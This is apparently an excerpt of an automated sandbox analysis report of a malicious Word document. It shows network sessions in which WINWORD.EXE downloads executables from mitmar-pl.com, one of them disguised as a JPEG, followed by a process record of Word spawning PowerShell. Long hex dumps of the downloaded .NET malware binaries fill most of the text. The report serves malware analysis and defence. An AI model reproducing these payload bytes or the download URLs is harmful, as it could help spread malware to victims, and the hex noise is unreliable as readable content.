2c 11 17 04 11 17 28 17 00 00 06 28 05 00 00 0a 13 2a 20 01 00 00 00 7e 68 00 00 04 39 98 ff ff ff 26 20 01 00 00 00 38 8d ff ff ff 11 2f 28 16 00 00 06 74 04 00 00 01 13 17 38 bf ff ff ff 28 18 00 00 06 11 2a 28 12 00 00 06 13 19 20 00 00 00 00 7e 0d 00 00 04 39 5d ff ff ff 26 20 00 00 00 00 38 52 ff ff ff dd 03 03 00 00 11 2f 75 14 00 00 01 13 1a 38 16 00 00 00 fe 0c 0f 00 45 02 00 00 00 32 00 00 00 26 00 00 00 38 2d 00 00 00 11 1a 3a 1a 00 00 00 20 00 00 00 00 7e 50 00 00 04 3a d8 ff ff ff 26 20 00 00 00 00 38 cd ff ff ff 11 1a 6f
                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELY0TNs @ @@sKX H.textTS T `.rsrcXV@@.reloc @B0sHB/Hr0rp((((*0Q $8$ESc^7>2([m88M ~_:& 8(Eq^8io8/(:8 8,((* ~h9& 8/(t8(*( ~9]& 8R/u8E2&8-: ~P:& 8o
                                                          Jan 14, 2022 10:23:22.545994043 CET208INData Raw: 06 00 00 0a 38 1f 00 00 00 38 1b 00 00 00 20 01 00 00 00 7e 65 00 00 04 3a ad ff ff ff 26 20 00 00 00 00 38 a2 ff ff ff 00 dc 38 8c 02 00 00 11 03 11 1d 16 11 1d 8e 69 6f 04 00 00 0a 20 1c 00 00 00 7e 48 00 00 04 3a 0f fe ff ff 26 20 0b 00 00 00
                                                          Data Ascii: 88 ~e:& 88io ~H:& 88W 8o(/8a88\ 8: 8r'p( ~:& 8r=p.((8E
                                                          Jan 14, 2022 10:23:22.546013117 CET210INData Raw: 00 00 38 13 ff ff ff 11 12 6f 10 00 00 0a 72 54 01 00 70 28 13 00 00 06 13 13 20 00 00 00 00 7e 2b 00 00 04 3a f1 fe ff ff 26 20 00 00 00 00 38 e6 fe ff ff 00 00 28 11 00 00 0a 72 72 01 00 70 11 2e 72 7c 01 00 70 28 11 00 00 06 6f 12 00 00 0a 13
                                                          Data Ascii: 8orTp( ~+:& 8(rrp.r|p(o ~q9& 8E8(rrp.rp((8`&8S8N1X181 ~"9C& 88) ~q
                                                          Jan 14, 2022 10:23:22.546030998 CET211INData Raw: 38 73 f8 ff ff 73 28 00 00 0a 13 03 20 18 00 00 00 7e 4f 00 00 04 39 cc f3 ff ff 26 20 0c 00 00 00 38 c1 f3 ff ff 00 00 00 41 dc 00 00 00 00 00 00 46 03 00 00 17 00 00 00 5d 03 00 00 0d 00 00 00 01 00 00 01 00 00 00 00 6e 0a 00 00 19 00 00 00 87
                                                          Data Ascii: 8ss( ~O9& 8AF]n&rorp'A\d3
                                                          Jan 14, 2022 10:23:22.546134949 CET213INData Raw: 00 00 44 05 00 00 41 0b 00 00 46 03 00 00 4f 0f 00 00 b2 07 00 00 82 02 00 00 bb 0b 00 00 ff 0a 00 00 59 01 00 00 0a 03 00 00 95 0d 00 00 5e 04 00 00 96 03 00 00 33 0a 00 00 86 00 00 00 a2 0e 00 00 21 0e 00 00 ee 07 00 00 d8 09 00 00 9d 08 00 00
                                                          Data Ascii: DAFOY^3!jBh7L"Key4=-jH.
                                                          Jan 14, 2022 10:23:22.546153069 CET214INData Raw: 2d 44 77 0a 59 20 f8 70 1b 94 61 80 41 00 00 04 20 05 00 00 00 28 36 00 00 06 39 90 fa ff ff 26 20 09 00 00 00 38 85 fa ff ff 20 ce 7f 90 96 66 20 4a 97 9f 2f 61 20 7b 17 f0 46 61 80 1b 00 00 04 38 9a 05 00 00 20 5b eb 9c 4e 20 04 97 7d 4c 61 20
                                                          Data Ascii: -DwY paA (69& 8 f J/a {Fa8 [N }La _|a) B(79D& 89 7f3 NjX -DwY pa\ (7:& &8 +7Q |WX taD89 T$lf -Wac A8 Qt j"Fta a
                                                          Jan 14, 2022 10:23:22.546170950 CET215INData Raw: 59 20 05 00 00 00 63 20 5a 22 07 03 61 80 35 00 00 04 20 31 00 00 00 38 59 f5 ff ff 20 8e 15 6e 76 20 02 00 00 00 62 20 04 00 00 00 63 20 63 85 9b fd 61 80 57 00 00 04 20 34 00 00 00 38 33 f5 ff ff 20 e0 68 76 c7 20 01 00 00 00 62 20 f2 b5 f2 cb
                                                          Data Ascii: Y c Z"a5 18Y nv b c caW 483 hv b a* 8 q] c 8ya !8 . ;6Y Qat '8 Xo+J b `(a 8 WSe zhaE F8 W -(qa c
                                                          Jan 14, 2022 10:23:22.546189070 CET217INData Raw: 20 03 00 00 00 62 20 91 a8 65 8e 61 80 3b 00 00 04 38 2f f2 ff ff 20 24 08 24 c9 20 04 00 00 00 63 20 82 40 92 fc 61 80 2b 00 00 04 20 2c 00 00 00 38 05 f0 ff ff 20 54 24 6c c8 66 20 ab db 93 37 61 80 4f 00 00 04 38 ee fe ff ff 20 e5 bb 06 c9 20
                                                          Data Ascii: b ea;8/ $$ c @a+ ,8 T$lf 7aO8 b (5Ha /(6:& 8 3 1Y c Z"a 38 .`zf c (ad +8x Oe ,z<Y 9^aT8(4*&~z*
                                                          Jan 14, 2022 10:23:22.546273947 CET218INData Raw: 02 13 00 95 11 69 02 13 00 b8 11 69 02 13 00 db 11 69 02 13 00 fe 11 69 02 13 00 21 12 69 02 13 00 44 12 69 02 13 00 67 12 69 02 13 00 8a 12 69 02 13 00 ad 12 69 02 13 00 d0 12 69 02 13 00 f3 12 69 02 13 00 16 13 69 02 13 00 39 13 69 02 13 00 5c
                                                          Data Ascii: iiii!iDigiiiiii9i\iiiiii.iQitiiiii#iFiiiiiiii;i^iiiii
                                                          Jan 14, 2022 10:23:22.546291113 CET219INData Raw: 04 22 01 39 01 a4 04 29 01 39 01 ab 04 30 01 01 01 b7 04 c7 00 21 00 c5 02 35 01 71 00 c0 04 ad 00 79 00 ca 04 3c 01 a9 00 bd 03 41 01 49 00 e7 04 4c 01 39 01 f9 04 d8 00 51 01 bd 03 93 00 09 00 bd 03 93 00 e9 00 26 05 55 01 71 00 47 05 5a 01 21
                                                          Data Ascii: "9)90!5qy<AIL9Q&UqGZ!ql99I}6W}!"A><g9aai y[
                                                          Jan 14, 2022 10:23:22.574367046 CET221INData Raw: 4b 65 79 73 00 4b 65 79 73 43 6f 6c 6c 65 63 74 69 6f 6e 00 43 6f 6e 63 61 74 00 73 65 74 5f 4b 65 65 70 41 6c 69 76 65 00 53 65 72 76 69 63 65 50 6f 69 6e 74 4d 61 6e 61 67 65 72 00 73 65 74 5f 53 65 63 75 72 69 74 79 50 72 6f 74 6f 63 6f 6c 00
                                                          Data Ascii: KeysKeysCollectionConcatset_KeepAliveServicePointManagerset_SecurityProtocolSecurityProtocolTypeget_LengthCloseReadProcessSystem.Diagnosticsget_MainWindowHandleIntPtrGetMethodsMemberInfoget_NameEncodingSystem.Textget_ASCIIG


                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          2192.168.2.224916937.0.9.16680C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                          TimestampkBytes transferredDirectionData
                                                          Jan 14, 2022 10:23:23.479233027 CET408OUTGET /okcff.exe HTTP/1.1
                                                          Host: mitmar-pl.com
                                                          Connection: Keep-Alive
                                                          Jan 14, 2022 10:23:23.507251978 CET410INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Fri, 14 Jan 2022 09:23:23 GMT
                                                          Content-Type: application/x-msdownload
                                                          Content-Length: 194560
                                                          Last-Modified: Fri, 14 Jan 2022 05:56:32 GMT
                                                          Connection: keep-alive
                                                          ETag: "61e11090-2f800"
                                                          Accept-Ranges: bytes
                                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 9a 59 03 f6 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 30 00 00 54 00 00 00 a2 02 00 00 00 00 00 4e 73 00 00 00 20 00 00 00 80 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 03 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 73 00 00 4b 00 00 00 00 80 00 00 58 9f 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 03 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 54 53 00 00 00 20 00 00 00 54 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 58 9f 02 00 00 80 00 00 00 a0 02 00 00 56 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 03 00 00 02 00 00 00 f6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 73 00 00 00 00 00 00 48 00 00 00 02 00 05 00 98 42 00 00 b0 2f 00 00 03 00 00 00 01 00 00 06 48 72 00 00 b8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 04 00 1f 00 00 00 01 00 00 11 00 72 01 00 00 70 28 01 00 00 0a 28 02 00 00 0a 14 28 02 00 00 06 0a 06 28 03 00 00 0a 00 2a 00 1b 30 08 00 51 0c 00 00 02 00 00 11 20 0f 00 00 00 fe 0e 24 00 38 00 00 00 00 fe 0c 24 00 45 1f 00 00 00 e1 0a 00 00 19 0a 00 00 a4 01 00 00 ae 01 00 00 83 01 00 00 53 01 00 00 a8 0a 00 00 0c 0b 00 00 8f 02 00 00 63 05 00 00 dc 02 00 00 90 01 00 00 5e 09 00 00 b9 01 00 00 b2 02 00 00 37 05 00 00 3e 0b 00 00 32 0a 00 00 86 08 00 00 f1 03 00 00 0b 0a 00 00 9d 0b 00 00 28 0a 00 00 f7 01 00 00 cd 09 00 00 ca 01 00 00 97 0a 00 00 5b 09 00 00 f4 0a 00 00 1b 08 00 00 6d 0b 00 00 38 dc 0a 00 00 00 38 4d 00 00 00 20 03 00 00 00 7e 5f 00 00 04 3a 0f 00 00 00 26 20 01 00 00 00 38 04 00 00 00 fe 0c 28 00 45 04 00 00 00 05 00 00 00 71 00 00 00 99 00 00 00 5e 00 00 00 38 00 00 00 00 11 03 11 19 16 11 19 8e 69 6f 04 00 00 0a 38 00 00 00 00 00 00 11 2f 28 19 00 00 06 3a 38 00 00 00 20 02 00 00 00 38 bb ff ff ff 00 11 2c 11 17 04 11 17 28 17 00 00 06 28 05 00 00 0a 13 2a 20 01 00 00 00 7e 68 00 00 04 39 98 ff ff ff 26 20 01 00 00 00 38 8d ff ff ff 11 2f 28 16 00 00 06 74 04 00 00 01 13 17 38 bf ff ff ff 28 18 00 00 06 11 2a 28 12 00 00 06 13 19 20 00 00 00 00 7e 0d 00 00 04 39 5d ff ff ff 26 20 00 00 00 00 38 52 ff ff ff dd 03 03 00 00 11 2f 75 14 00 00 01 13 1a 38 16 00 00 00 fe 0c 0f 00 45 02 00 00 00 32 00 00 00 26 00 00 00 38 2d 00 00 00 11 1a 3a 1a 00 00 00 20 00 00 00 00 7e 50 00 00 04 3a d8 ff ff ff 26 20 00 00 00 00 38 cd ff ff ff 11 1a 6f
                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELY0TNs @ @@sKX H.textTS T `.rsrcXV@@.reloc @B0sHB/Hr0rp((((*0Q $8$ESc^7>2([m88M ~_:& 8(Eq^8io8/(:8 8,((* ~h9& 8/(t8(*( ~9]& 8R/u8E2&8-: ~P:& 8o
                                                          Jan 14, 2022 10:23:23.507287025 CET411INData Raw: 06 00 00 0a 38 1f 00 00 00 38 1b 00 00 00 20 01 00 00 00 7e 65 00 00 04 3a ad ff ff ff 26 20 00 00 00 00 38 a2 ff ff ff 00 dc 38 8c 02 00 00 11 03 11 1d 16 11 1d 8e 69 6f 04 00 00 0a 20 1c 00 00 00 7e 48 00 00 04 3a 0f fe ff ff 26 20 0b 00 00 00
                                                          Data Ascii: 88 ~e:& 88io ~H:& 88W 8o(/8a88\ 8: 8r'p( ~:& 8r=p.((8E
                                                          Jan 14, 2022 10:23:23.507312059 CET412INData Raw: 00 00 38 13 ff ff ff 11 12 6f 10 00 00 0a 72 54 01 00 70 28 13 00 00 06 13 13 20 00 00 00 00 7e 2b 00 00 04 3a f1 fe ff ff 26 20 00 00 00 00 38 e6 fe ff ff 00 00 28 11 00 00 0a 72 72 01 00 70 11 2e 72 7c 01 00 70 28 11 00 00 06 6f 12 00 00 0a 13
                                                          Data Ascii: 8orTp( ~+:& 8(rrp.r|p(o ~q9& 8E8(rrp.rp((8`&8S8N1X181 ~"9C& 88) ~q
                                                          Jan 14, 2022 10:23:23.507335901 CET414INData Raw: 38 73 f8 ff ff 73 28 00 00 0a 13 03 20 18 00 00 00 7e 4f 00 00 04 39 cc f3 ff ff 26 20 0c 00 00 00 38 c1 f3 ff ff 00 00 00 41 dc 00 00 00 00 00 00 46 03 00 00 17 00 00 00 5d 03 00 00 0d 00 00 00 01 00 00 01 00 00 00 00 6e 0a 00 00 19 00 00 00 87
                                                          Data Ascii: 8ss( ~O9& 8AF]n&rorp'A\d3
                                                          Jan 14, 2022 10:23:23.507364035 CET415INData Raw: 00 00 44 05 00 00 41 0b 00 00 46 03 00 00 4f 0f 00 00 b2 07 00 00 82 02 00 00 bb 0b 00 00 ff 0a 00 00 59 01 00 00 0a 03 00 00 95 0d 00 00 5e 04 00 00 96 03 00 00 33 0a 00 00 86 00 00 00 a2 0e 00 00 21 0e 00 00 ee 07 00 00 d8 09 00 00 9d 08 00 00
                                                          Data Ascii: DAFOY^3!jBh7L"Key4=-jH.
                                                          Jan 14, 2022 10:23:23.507390976 CET417INData Raw: 2d 44 77 0a 59 20 f8 70 1b 94 61 80 41 00 00 04 20 05 00 00 00 28 36 00 00 06 39 90 fa ff ff 26 20 09 00 00 00 38 85 fa ff ff 20 ce 7f 90 96 66 20 4a 97 9f 2f 61 20 7b 17 f0 46 61 80 1b 00 00 04 38 9a 05 00 00 20 5b eb 9c 4e 20 04 97 7d 4c 61 20
                                                          Data Ascii: -DwY paA (69& 8 f J/a {Fa8 [N }La _|a) B(79D& 89 7f3 NjX -DwY pa\ (7:& &8 +7Q |WX taD89 T$lf -Wac A8 Qt j"Fta a
                                                          Jan 14, 2022 10:23:23.507416964 CET418INData Raw: 59 20 05 00 00 00 63 20 5a 22 07 03 61 80 35 00 00 04 20 31 00 00 00 38 59 f5 ff ff 20 8e 15 6e 76 20 02 00 00 00 62 20 04 00 00 00 63 20 63 85 9b fd 61 80 57 00 00 04 20 34 00 00 00 38 33 f5 ff ff 20 e0 68 76 c7 20 01 00 00 00 62 20 f2 b5 f2 cb
                                                          Data Ascii: Y c Z"a5 18Y nv b c caW 483 hv b a* 8 q] c 8ya !8 . ;6Y Qat '8 Xo+J b `(a 8 WSe zhaE F8 W -(qa c
                                                          Jan 14, 2022 10:23:23.507442951 CET419INData Raw: 20 03 00 00 00 62 20 91 a8 65 8e 61 80 3b 00 00 04 38 2f f2 ff ff 20 24 08 24 c9 20 04 00 00 00 63 20 82 40 92 fc 61 80 2b 00 00 04 20 2c 00 00 00 38 05 f0 ff ff 20 54 24 6c c8 66 20 ab db 93 37 61 80 4f 00 00 04 38 ee fe ff ff 20 e5 bb 06 c9 20
                                                          Data Ascii: b ea;8/ $$ c @a+ ,8 T$lf 7aO8 b (5Ha /(6:& 8 3 1Y c Z"a 38 .`zf c (ad +8x Oe ,z<Y 9^aT8(4*&~z*
                                                          Jan 14, 2022 10:23:23.507565022 CET421INData Raw: 02 13 00 95 11 69 02 13 00 b8 11 69 02 13 00 db 11 69 02 13 00 fe 11 69 02 13 00 21 12 69 02 13 00 44 12 69 02 13 00 67 12 69 02 13 00 8a 12 69 02 13 00 ad 12 69 02 13 00 d0 12 69 02 13 00 f3 12 69 02 13 00 16 13 69 02 13 00 39 13 69 02 13 00 5c
                                                          Data Ascii: iiii!iDigiiiiii9i\iiiiii.iQitiiiii#iFiiiiiiii;i^iiiii
                                                          Jan 14, 2022 10:23:23.507594109 CET422INData Raw: 04 22 01 39 01 a4 04 29 01 39 01 ab 04 30 01 01 01 b7 04 c7 00 21 00 c5 02 35 01 71 00 c0 04 ad 00 79 00 ca 04 3c 01 a9 00 bd 03 41 01 49 00 e7 04 4c 01 39 01 f9 04 d8 00 51 01 bd 03 93 00 09 00 bd 03 93 00 e9 00 26 05 55 01 71 00 47 05 5a 01 21
                                                          Data Ascii: "9)90!5qy<AIL9Q&UqGZ!ql99I}6W}!"A><g9aai y[
                                                          Jan 14, 2022 10:23:23.534348011 CET424INData Raw: 4b 65 79 73 00 4b 65 79 73 43 6f 6c 6c 65 63 74 69 6f 6e 00 43 6f 6e 63 61 74 00 73 65 74 5f 4b 65 65 70 41 6c 69 76 65 00 53 65 72 76 69 63 65 50 6f 69 6e 74 4d 61 6e 61 67 65 72 00 73 65 74 5f 53 65 63 75 72 69 74 79 50 72 6f 74 6f 63 6f 6c 00
                                                          Data Ascii: KeysKeysCollectionConcatset_KeepAliveServicePointManagerset_SecurityProtocolSecurityProtocolTypeget_LengthCloseReadProcessSystem.Diagnosticsget_MainWindowHandleIntPtrGetMethodsMemberInfoget_NameEncodingSystem.Textget_ASCIIG


                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          3192.168.2.224917037.0.9.16680C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                          TimestampkBytes transferredDirectionData
                                                          Jan 14, 2022 10:23:27.105874062 CET612OUTGET /Crkrqdrd.jpeg HTTP/1.1
                                                          Host: mitmar-pl.com
                                                          Connection: Keep-Alive
                                                          Jan 14, 2022 10:23:27.134126902 CET614INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Fri, 14 Jan 2022 09:23:27 GMT
                                                          Content-Type: image/jpeg
                                                          Content-Length: 519680
                                                          Last-Modified: Fri, 14 Jan 2022 05:40:37 GMT
                                                          Connection: keep-alive
                                                          ETag: "61e10cd5-7ee00"
                                                          Accept-Ranges: bytes
                                                          Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 c0 00 00 00 0c 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 00 2e 00 30 00 2e 00 30 00 2e 00 31 00 00 00 6e 00 6f 00 69 00 73 00 72 00 65 00 56 00 20 00 79 00 6c 00 62 00 6d 00 65 00 73 00 73 00 41 00 01 00 08 00 38 00 00 00 30 00 2e 00 30 00 2e 00 30 00 2e 00 31 00 00 00 6e 00 6f 00 69 00 73 00 72 00 65 00 56 00 74 00 63 00 75 00 64 00 6f 00 72 00 50 00 01 00 08 00 34 00 00 00 00 00 00 00 00 00 65 00 6d 00 61 00 4e 00 74 00 63 00 75 00 64 00 6f 00 72 00 50 00 01 00 01 00 22 00 00 00 6c 00 6c 00 64 00 2e 00 64 00 72 00 6b 00 62 00 6d 00 73 00 78 00 79 00 6e 00 69 00 69 00 73 00 6f 00 77 00 67 00 74 00 74 00 67 00 53 00 00 00 65 00 6d 00 61 00 6e 00 65 00 6c 00 69 00 46 00 6c 00 61 00 6e 00 69 00 67 00 69 00 72 00 4f 00 01 00 18 00 58 00 00 00 00 00 00 00 00 00 73 00 6b 00 72 00 61 00 6d 00 65 00 64 00 61 00 72 00 54 00 6c 00 61 00 67 00 65 00 4c 00 01 00 01 00 2a 00 00 00 00 00 32 00 32 00 30 00 32 00 20 00 a9 00 20 00 74 00 68 00 67 00 69 00 72 00 79 00 70 00 6f 00 43 00 00 00 74 00 68 00 67 00 69 00 72 00 79 00 70 00 6f 00 43 00 6c 00 61 00 67 00 65 00 4c 00 01 00 11 00 46 00 00 00 6c 00 6c 00 64 00 2e 00 64 00 72 00 6b 00 62 00 6d 00 73 00 78 00 79 00 6e 00 69 00 69 00 73 00 6f 00 77 00 67 00 74 00 74 00 67 00 53 00 00 00 65 00 6d 00 61 00 4e 00 6c 00 61 00 6e 00 72 00 65 00 74 00 6e 00 49 00 01 00 18 00 50 00 00 00 30 00 2e 00 30 00 2e 00 30 00 2e 00 31 00 00 00 00 00 6e 00 6f 00 69 00 73 00
                                                          Data Ascii: 40.0.0.1noisreV ylbmessA80.0.0.1noisreVtcudorP4emaNtcudorP"lld.drkbmsxyniisowgttgSemaneliFlanigirOXskramedarTlageL*2202 thgirypoCthgirypoClageLFlld.drkbmsxyniisowgttgSemaNlanretnIP0.0.0.1nois
                                                          Jan 14, 2022 10:23:27.134172916 CET615INData Raw: 72 00 65 00 56 00 65 00 6c 00 69 00 46 00 01 00 08 00 30 00 00 00 00 00 00 00 00 00 6e 00 6f 00 69 00 74 00 70 00 69 00 72 00 63 00 73 00 65 00 44 00 65 00 6c 00 69 00 46 00 01 00 01 00 2a 00 00 00 00 00 00 00 00 00 65 00 6d 00 61 00 4e 00 79 00
                                                          Data Ascii: reVeliF0noitpircseDeliF*emaNynapmoC"stnemmoC0b400000`ofnIeliFgnirtSnoitalsnarT$ofnIeliF
                                                          Jan 14, 2022 10:23:27.134190083 CET616INData Raw: 5c 00 31 00 22 00 2e 00 3f 00 6b 00 36 00 23 15 00 00 33 00 40 00 53 00 31 00 22 00 2b 00 40 00 6b 00 36 00 23 15 00 00 2c 00 6b 00 68 00 30 00 22 00 57 00 3f 00 6b 00 36 00 23 15 00 00 31 00 33 00 3b 00 28 00 22 00 3f 00 3e 00 6b 00 36 00 23 15
                                                          Data Ascii: \1".?k6#3@S1"+@k6#,kh0"W?k6#13;("?>k6#RNa""\@k6#3?M("R@k6#8\tt!N>k6#ekc$"Q?k6#deZ$"4>k6#];p#"$?k6#Z)U#"P?k6#Vf0
                                                          Jan 14, 2022 10:23:27.134215117 CET618INData Raw: 12 08 08 08 05 1d 0a 05 01 69 12 15 0b 0c 07 19 0a 18 01 00 04 a0 81 12 08 02 07 06 1c 09 01 00 04 81 82 11 f5 81 12 01 00 08 1c 05 01 00 04 08 0a 0a 03 07 05 08 08 08 08 08 08 06 07 08 85 80 11 08 08 50 83 12 1d 08 08 08 50 83 12 50 83 12 08 0a
                                                          Data Ascii: iPPP0|!
                                                          Jan 14, 2022 10:23:27.134246111 CET619INData Raw: 08 09 04 07 06 09 05 1d 09 03 07 06 05 01 07 03 04 81 12 01 07 05 08 1d 1c 01 02 20 06 08 1d 1c 01 20 05 03 08 01 02 20 05 08 18 06 02 00 05 c9 82 12 18 01 00 06 03 18 02 07 04 00 13 01 7d 12 15 06 00 13 00 13 08 02 20 07 00 13 08 02 65 11 15 07
                                                          Data Ascii: } e U-U ee
                                                          Jan 14, 2022 10:23:27.134268999 CET620INData Raw: 12 0a 1c 06 07 0f d1 80 12 01 07 05 09 08 02 94 82 12 04 07 08 08 0a 0a 0a 0a 08 0a 08 19 83 12 19 83 12 19 83 12 08 19 83 12 08 0e 07 18 0a 1c 01 20 04 2d 12 0a 02 07 05 2d 12 0a 1c 03 07 06 19 83 12 8d 80 12 01 20 08 19 83 12 1d 09 82 12 ed 81
                                                          Data Ascii: -- &```$
                                                          Jan 14, 2022 10:23:27.134290934 CET622INData Raw: 80 82 12 01 0a 05 80 82 12 01 7d 12 15 07 1c 08 01 00 04 08 02 02 07 04 05 82 12 00 00 05 0e 0e 02 02 00 05 dd 82 11 0e 02 02 20 07 02 01 81 81 11 15 06 dd 82 11 0e 0e 02 03 00 08 02 01 81 81 11 15 05 82 12 a5 81 12 1c 1d 19 83 12 08 06 07 14 08
                                                          Data Ascii: } UUUU qq
                                                          Jan 14, 2022 10:23:27.134316921 CET623INData Raw: 0c 20 18 e4 82 11 10 e0 82 11 10 0e 18 09 02 18 18 0e 0e 02 0a 20 13 a0 83 12 06 04 84 83 12 06 04 8c 83 12 06 04 98 83 12 06 04 90 83 12 06 04 a8 83 12 06 04 94 83 12 06 04 a4 83 12 06 04 88 83 12 06 04 9c 83 12 06 04 1c 31 12 08 e5 80 12 03 20
                                                          Data Ascii: 1 p p pdH
                                                          Jan 14, 2022 10:23:27.134335041 CET625INData Raw: 12 0b 1c 05 1d 04 00 0c 19 83 12 02 01 00 06 0e 0e 00 1e 02 01 10 07 08 01 81 81 11 15 08 05 1d 90 81 12 01 04 00 0f 05 1d 05 1d 01 20 06 74 83 12 90 81 12 05 1d 02 20 0a 0a 05 1d 01 02 20 06 00 82 11 06 04 0e 02 01 00 04 09 81 12 00 00 05 09 81
                                                          Data Ascii: t ` ` ` ( (
                                                          Jan 14, 2022 10:23:27.134910107 CET626INData Raw: 05 05 82 12 06 04 09 00 20 03 1c 09 01 02 20 05 90 81 12 06 04 44 12 06 03 e5 80 12 1c 01 20 06 1c 31 12 1c 1d 1c e5 80 12 04 20 0b 1c 1d 1c 1c 02 20 06 02 05 82 12 18 81 12 4c 12 05 82 12 04 00 0e 09 82 12 05 82 12 02 55 12 15 06 0b e5 80 12 02
                                                          Data Ascii: D 1 LU 1
                                                          Jan 14, 2022 10:23:27.160954952 CET628INData Raw: 12 01 00 08 1c 1d 19 83 12 1d 19 83 12 1d 1c 1d 0e 21 81 12 1c 06 20 13 3c 82 12 8c 82 12 1d 01 20 09 0e 0e 0e 02 00 05 05 82 12 02 01 20 06 c4 80 11 b8 80 12 01 00 08 02 02 94 82 12 94 82 12 94 82 12 04 00 0d 0e 0e d1 80 12 02 00 07 02 02 01 02
                                                          Data Ascii: ! < LDLX X qUUUTUqq


                                                          Code Manipulations

                                                          Statistics

                                                          CPU Usage

                                                          Click to jump to process

                                                          Memory Usage

                                                          Click to jump to process

                                                          High Level Behavior Distribution

                                                          Click to dive into process behavior distribution

                                                          Behavior

                                                          Click to jump to process

                                                          System Behavior

                                                          Analysis Process: WINWORD.EXE PID: 2724 Parent PID: 596

                                                          General

                                                          Start time:10:22:23
                                                          Start date:14/01/2022
                                                          Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                                                          Imagebase:0x13f6b0000
                                                          File size:1423704 bytes
                                                          MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          Chronological Activities

                                                          Analysis Process: powershell.exe PID: 2904 Parent PID: 2724

                                                          General

                                                          Start time:10:22:27
